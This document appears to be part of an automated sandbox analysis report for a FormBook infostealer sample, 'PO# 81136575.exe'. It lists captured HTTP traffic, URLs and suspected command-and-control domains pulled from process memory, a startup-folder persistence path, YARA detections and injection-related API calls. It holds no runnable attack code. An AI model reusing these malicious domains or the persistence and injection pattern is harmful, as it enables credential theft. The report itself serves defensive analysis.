                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 28 Nov 2024 17:57:21 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 28 Nov 2024 17:57:24 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 28 Nov 2024 17:57:27 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 28 Nov 2024 17:57:30 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 28 Nov 2024 18:02:32 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 28 Nov 2024 18:02:35 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: PO# 81136575.exe, 00000000.00000002.1263148906.00000000703F1000.00000020.00000001.01000000.00000009.sdmpString found in binary or memory: http://beta.visualstudio.net/net/sdk/feedback.asp
                Source: sages.exe, 00000016.00000002.5956179976.00000000008FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.microsoft.c
                Source: sage.exe, 0000000E.00000002.6029462311.000000000F382000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.0000000006FF2000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: http://homebizsuccess.blog/sn35/?VX=2Ljw85fE62irHv4CO6sOxtyqmKbvzO49yiJy4Znj95Je
                Source: sage.exe, 0000000E.00000002.6029462311.000000000ED3A000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.00000000069AA000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5960102666.0000000007E80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot
                Source: sage.exe, 0000000E.00000002.6029462311.000000000ED3A000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.00000000069AA000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5960102666.0000000007E80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefix
                Source: sage.exe, 0000000E.00000002.6029462311.000000000ED3A000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.00000000069AA000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5960102666.0000000007E80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otf
                Source: sage.exe, 0000000E.00000002.6029462311.000000000ED3A000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.00000000069AA000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5960102666.0000000007E80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-bold
                Source: sage.exe, 0000000E.00000002.6029462311.000000000ED3A000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.00000000069AA000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5960102666.0000000007E80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttf
                Source: sage.exe, 0000000E.00000002.6029462311.000000000ED3A000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.00000000069AA000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5960102666.0000000007E80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff
                Source: sage.exe, 0000000E.00000002.6029462311.000000000ED3A000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.00000000069AA000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5960102666.0000000007E80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff2
                Source: sage.exe, 0000000E.00000002.6029462311.000000000ED3A000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.00000000069AA000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5960102666.0000000007E80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot
                Source: sage.exe, 0000000E.00000002.6029462311.000000000ED3A000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.00000000069AA000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5960102666.0000000007E80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefix
                Source: sage.exe, 0000000E.00000002.6029462311.000000000ED3A000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.00000000069AA000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5960102666.0000000007E80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otf
                Source: sage.exe, 0000000E.00000002.6029462311.000000000ED3A000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.00000000069AA000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5960102666.0000000007E80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regular
                Source: sage.exe, 0000000E.00000002.6029462311.000000000ED3A000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.00000000069AA000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5960102666.0000000007E80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttf
                Source: sage.exe, 0000000E.00000002.6029462311.000000000ED3A000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.00000000069AA000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5960102666.0000000007E80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff
                Source: sage.exe, 0000000E.00000002.6029462311.000000000ED3A000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.00000000069AA000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5960102666.0000000007E80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2
                Source: sage.exe, 0000000E.00000002.6029462311.000000000ED3A000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.00000000069AA000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5960102666.0000000007E80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/js/min.js?v2.3
                Source: sage.exe, 0000000E.00000002.6029462311.000000000ED3A000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.00000000069AA000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5960102666.0000000007E80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpg
                Source: sage.exe, 0000000E.00000002.6029462311.000000000ED3A000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.00000000069AA000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5960102666.0000000007E80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/pics/28903/search.png)
                Source: sage.exe, 0000000E.00000002.6029462311.000000000ED3A000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.00000000069AA000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5960102666.0000000007E80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/pics/28905/arrrow.png)
                Source: sage.exe, 0000000E.00000002.6029462311.000000000ED3A000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.00000000069AA000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5960102666.0000000007E80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/pics/29590/bg1.png)
                Source: sage.exe, 0000000E.00000002.6029462311.000000000ED3A000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.00000000069AA000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5960102666.0000000007E80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://i2.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpg
                Source: PO# 81136575.exe, 00000000.00000002.1257906767.0000000005F32000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://purl.oen
                Source: sage.exe, 00000011.00000002.6049294447.00000000058A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://purl.oen=9
                Source: sage.exe, 0000000E.00000002.6012035049.00000000058E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://purl.oenS5
                Source: sage.exe, 0000000E.00000002.6029462311.000000000ED3A000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.00000000069AA000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5960102666.0000000007E80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.Slwmarketing.online
                Source: sage.exe, 0000000E.00000002.6031342259.000000000FCED000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.homebizsuccess.blog
                Source: sage.exe, 0000000E.00000002.6031342259.000000000FCED000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.homebizsuccess.blog/sn35/
                Source: sage.exe, 0000000E.00000002.6029462311.000000000ED3A000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.00000000069AA000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5960102666.0000000007E80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.slwmarketing.online/Exchange.cfm?fp=j4IJ8dhE9wDFyDIIjviqztKLPQy021ALH0tYM6%2FRantCn63Wcie
                Source: sage.exe, 0000000E.00000002.6029462311.000000000ED3A000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.00000000069AA000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5960102666.0000000007E80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.slwmarketing.online/Internet_Search_Engines.cfm?fp=j4IJ8dhE9wDFyDIIjviqztKLPQy021ALH0tYM6
                Source: sage.exe, 0000000E.00000002.6029462311.000000000ED3A000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.00000000069AA000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5960102666.0000000007E80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.slwmarketing.online/Marketing_Online_Strategy.cfm?fp=j4IJ8dhE9wDFyDIIjviqztKLPQy021ALH0tY
                Source: sage.exe, 0000000E.00000002.6029462311.000000000ED3A000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.00000000069AA000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5960102666.0000000007E80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.slwmarketing.online/Small_Business_Financing.cfm?fp=j4IJ8dhE9wDFyDIIjviqztKLPQy021ALH0tYM
                Source: sage.exe, 0000000E.00000002.6029462311.000000000ED3A000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.00000000069AA000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5960102666.0000000007E80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.slwmarketing.online/Trade.cfm?fp=j4IJ8dhE9wDFyDIIjviqztKLPQy021ALH0tYM6%2FRantCn63Wciee8E
                Source: sage.exe, 0000000E.00000002.6029462311.000000000ED3A000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.00000000069AA000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5960102666.0000000007E80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.slwmarketing.online/__media__/design/underconstructionnotice.php?d=slwmarketing.online
                Source: sage.exe, 0000000E.00000002.6029462311.000000000ED3A000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.00000000069AA000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5960102666.0000000007E80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.slwmarketing.online/__media__/js/trademark.php?d=slwmarketing.online&type=ns
                Source: clip.exe, 00000018.00000002.5959043483.0000000005D1A000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://aa57601869.xn--tnqx81c85gn1o9ud.com/download/57601869/57601869a1.html
                Source: clip.exe, 00000018.00000002.5959043483.0000000005D1A000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://aa57601869.xn--tnqx81c85gn1o9ud.com/download/57601869/57601869a2.html
                Source: sage.exe, 0000000E.00000002.6029462311.000000000E0AA000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.0000000005D1A000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://aa57601869.xn--tnqx81c85gn1o9ud.com/download/57601869/57601869a5.html
                Source: sage.exe, 0000000E.00000002.6029462311.000000000E0AA000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.0000000005D1A000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://aa57601869.xn--tnqx81c85gn1o9ud.com/download/57601869/57601869a6.html
                Source: sage.exe, 0000000E.00000002.6029462311.000000000E0AA000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.0000000005D1A000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://aa57601869.xn--tnqx81c85gn1o9ud.com/download/57601869/57601869a8.html
                Source: sage.exe, 0000000E.00000002.6029462311.000000000E0AA000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.0000000005D1A000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://aa57601869.xn--tnqx81c85gn1o9ud.com/download/57601869/57601869a9.html
                Source: clip.exe, 00000018.00000002.5960241652.000000000814F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: sage.exe, 0000000E.00000002.6029462311.000000000ED3A000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.00000000069AA000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://cdn.consentmanager.net
                Source: clip.exe, 00000018.00000002.5960241652.000000000814F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: sage.exe, 0000000E.00000002.6029462311.000000000ED3A000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.00000000069AA000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://delivery.consentmanager.net
                Source: clip.exe, 00000018.00000002.5959043483.00000000069AA000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://dts.gnpge.com
                Source: clip.exe, 00000018.00000003.2916902307.00000000081BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: clip.exe, 00000018.00000002.5960241652.000000000814F000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000018.00000003.2916902307.00000000081BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: clip.exe, 00000018.00000003.2916902307.00000000081BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: clip.exe, 00000018.00000002.5960241652.000000000814F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
                Source: sage.exe, 0000000E.00000002.6029462311.000000000E0AA000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.0000000005D1A000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://js.users.51.la/21851687.js
                Source: clip.exe, 00000018.00000002.5955950229.00000000030EC000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000018.00000003.2908988913.0000000003108000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000018.00000002.5955950229.0000000003108000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/
                Source: clip.exe, 00000018.00000002.5955950229.00000000030EC000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000018.00000003.2908988913.0000000003108000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000018.00000002.5955950229.0000000003108000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com//
                Source: clip.exe, 00000018.00000002.5955950229.00000000030EC000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000018.00000003.2908988913.0000000003108000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000018.00000002.5955950229.0000000003108000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/v104
                Source: clip.exe, 00000018.00000002.5955950229.00000000030CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrd?lcid=1033&syslcid=2057&uilcid=1033&app=1&ver=16&build=1
                Source: clip.exe, 00000018.00000002.5955950229.00000000030A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrdlcid=1033&syslcid=2057&uilcid=1033&app=1&ver=16&build=16
                Source: clip.exe, 00000018.00000003.2907985166.000000000813D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://odc.officeapps.live.com/odc/v2.1/hrdres://C:
                Source: clip.exe, 00000018.00000002.5960241652.000000000814F000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000018.00000003.2916902307.00000000081BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search
                Source: clip.exe, 00000018.00000003.2916902307.00000000081BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: sage.exe, 0000000E.00000002.6029462311.000000000DD86000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.00000000059F6000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://whois.gandi.net/en/results?search=akravchenko.dev
                Source: clip.exe, 00000018.00000002.5960241652.000000000814F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: sage.exe, 0000000E.00000002.6029462311.000000000DD86000.00000004.80000000.00040000.00000000.sdmp, clip.exe, 00000018.00000002.5959043483.00000000059F6000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.gandi.net/en/domain
                Source: clip.exe, 00000018.00000003.2916902307.00000000081BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 18.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 18.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000012.00000002.2734341431.0000000001930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000018.00000002.5955097403.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000018.00000002.5957899892.0000000004C00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000012.00000002.2731267987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000018.00000002.5957820613.0000000004BB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.6031342259.000000000FC40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: 18.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 18.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 00000012.00000002.2734341431.0000000001930000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 00000018.00000002.5955097403.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 00000018.00000002.5957899892.0000000004C00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 00000012.00000002.2731267987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 00000018.00000002.5957820613.0000000004BB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Source: 0000000E.00000002.6031342259.000000000FC40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
                Initial sample is a PE file and has a suspicious name
                Source: initial sampleStatic PE information: Filename: PO# 81136575.exe
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeProcess Stats: CPU usage > 6%
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 14_2_0FCC68C0 NtAllocateVirtualMemory,14_2_0FCC68C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0042C123 NtClose,18_2_0042C123
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01552BC0 NtQueryInformationToken,LdrInitializeThunk,18_2_01552BC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01552B90 NtFreeVirtualMemory,LdrInitializeThunk,18_2_01552B90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01552A80 NtClose,LdrInitializeThunk,18_2_01552A80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01552D10 NtQuerySystemInformation,LdrInitializeThunk,18_2_01552D10
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01552EB0 NtProtectVirtualMemory,LdrInitializeThunk,18_2_01552EB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015534E0 NtCreateMutant,LdrInitializeThunk,18_2_015534E0
